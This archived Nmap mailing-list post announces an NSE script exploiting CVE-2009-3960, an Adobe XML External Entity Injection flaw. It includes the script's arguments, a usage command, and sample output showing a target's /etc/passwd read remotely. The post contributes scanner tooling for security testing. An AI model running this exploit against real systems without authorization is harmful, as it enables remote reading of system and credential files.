Nmap Development mailing list archives

Previous By Date Next
Previous By Thread Next

[NSE] http-cve-2009-3960 (Adobe XML External Entity Injection)

From: Hani Benhabiles <kroosec () gmail com>
Date: Sat, 31 Dec 2011 15:47:06 +0100
Hi list,

description = [[
Exploits cve-2009-3960 also known as Adobe XML External Entity Injection.

This vulnerability permits to read local files remotely and is present in
BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0,  LiveCycle Data
Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and
ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0

For more information see:
*
http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
* http://www.osvdb.org/62292
* Metasploit module: auxiliary/scanner/http/adobe_xml_inject
]]

---
-- @args http-cve-2009-3960.root Points to the root path. Defaults to "/"
-- @args http-cve-2009-3960.readfile target file to be read. Defaults to
"/etc/passwd"
--
-- @usage
-- nmap --script=http-cve-2009-3960 --script-arg
http-http-cve-2009-3960.root="/root/" <target>
--
--@output
-- PORT   STATE SERVICE
-- 80/tcp open  http
--| http-cve-2009-3960:
--|     samples/messagebroker/http
--|     <?xml version="1.0" encoding="utf-8"?>
--|     <amfx ver="3"><body targetURI="/onResult" responseURI=""><object
type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string>
[...] root:x:0:0:root:/root:/bin/bash
--|     bin:*:1:1:bin:/bin:/sbin/nologin
--|     daemon:*:2:2:daemon:/sbin:/sbin/nologin
--|     adm:*:3:4:adm:/var/adm:/sbin/nologin
--|     lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
--|     sync:*:5:0:sync:/sbin:/bin/sync
--|     shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
--|     halt:*:7:0:halt:/sbin:/sbin/halt
--|     mail:*:8:12:mail:/var/spool/mail:/sbin/nologin
--|     news:*:9:13:news:/etc/news:
--|     uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin
--|     operator:*:11:0:operator:/root:/sbin/nologin
--|     games:*:12:100:games:/usr/games:/sbin/nologin
--|     gopher:*:13:30:gopher:/var/gopher:/sbin/nologin
--|     ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin
--|     nobody:*:99:99:Nobody:/:/sbin/nologin
--|     nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin
--|     vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin
--|     pcap:!!:77:77::/var/arpwatch:/sbin/nologin
--|     mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
--|     [...]
--|_

Cheers,
Hani

-- 
M. Hani Benhabiles
OWASP Algeria SC founder and president.
Blog: http://kroosec.blogspot.com
Twitter: kroosec <https://twitter.com/#%21/kroosec>

Attachment: http-cve-2009-3960.nse
Description: 

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
Previous By Date Next
Previous By Thread Next

Current thread: